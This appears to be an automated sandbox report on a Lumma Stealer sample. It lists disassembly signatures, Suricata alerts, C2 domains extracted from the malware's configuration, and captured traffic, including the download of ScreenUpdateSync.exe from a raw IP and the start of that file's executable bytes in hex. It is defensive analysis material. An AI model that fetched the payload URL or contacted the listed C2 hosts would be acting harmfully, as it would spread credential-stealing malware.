Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	1_2_00A160F7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, edx	1_2_009FC030
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	1_2_00A0E1E7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A1B05B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_00A2B2C4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_00A2B2C4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_00A2B2CF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_00A2B2CF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_009FD25A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	1_2_009FD25A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp eax	1_2_00A2C268
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp al, 2Eh	1_2_00A163B6
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_00A2B3FC
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_00A2B2C2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_00A2B2C2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	1_2_00A154D1
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ebx, edi	1_2_00A0D4D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	1_2_00A155B3
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	1_2_00A1559D
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	1_2_00A1552B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00A0C528
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	1_2_00A06544
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	1_2_00A0554C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	1_2_00A2D557
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	1_2_00A2D557
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A1C6C3
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_00A1A637
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, eax	1_2_00A17797
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp ecx	1_2_00A2C79B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	1_2_00A077E9
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	1_2_00A087DF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp eax	1_2_00A16739
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_00A1B763
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A1B763
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00A1C8B1
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00A23897
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A04806
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	1_2_00A10817
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_00A1B75E
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A1B75E
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00A1C98D
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00A1C99C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	1_2_00A189C0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	1_2_00A2A9DE
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov eax, edx	1_2_00A0C921
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00A06907
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00A1C94B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	1_2_009F9967
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	1_2_009F9967
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	1_2_009F9967
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	1_2_009FEAA2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_009FDA09
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_009FDA09
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_009FABA7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, ecx	1_2_009FABA7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00A15BF7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ecx, di	1_2_00A15BF7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	1_2_009FCB7E
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov esi, eax	1_2_00A13C9B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	1_2_00A26C3B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	1_2_00A2BC08
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00A19C17
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_00A0EC17
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	1_2_00A2CD87
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A2AD19
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	1_2_00A26E67
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	1_2_009FDF8C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	1_2_00A2CFC7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [ebx], dx	1_2_00A08F35
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_00A08F35
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A11F77
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00A05F79

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:52948 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:63184 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:56148 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:64277 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:63953 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:52644 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:65393 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:51481 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:60088 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49735 -> 23.55.153.106:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: immureprech.biz

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 13:12:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 14 Dec 2024 13:00:02 GMTETag: "58600-6293a86885370"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 29 04 00 50 00 00 00 00 10 42 00 30 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 22 00 00 00 10 04 00 00 24 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 f4 00 00 00 10 42 00 00 f6 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 104.21.22.222 104.21.22.222
Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: t.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz

Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091039362.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe#
Source: TN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
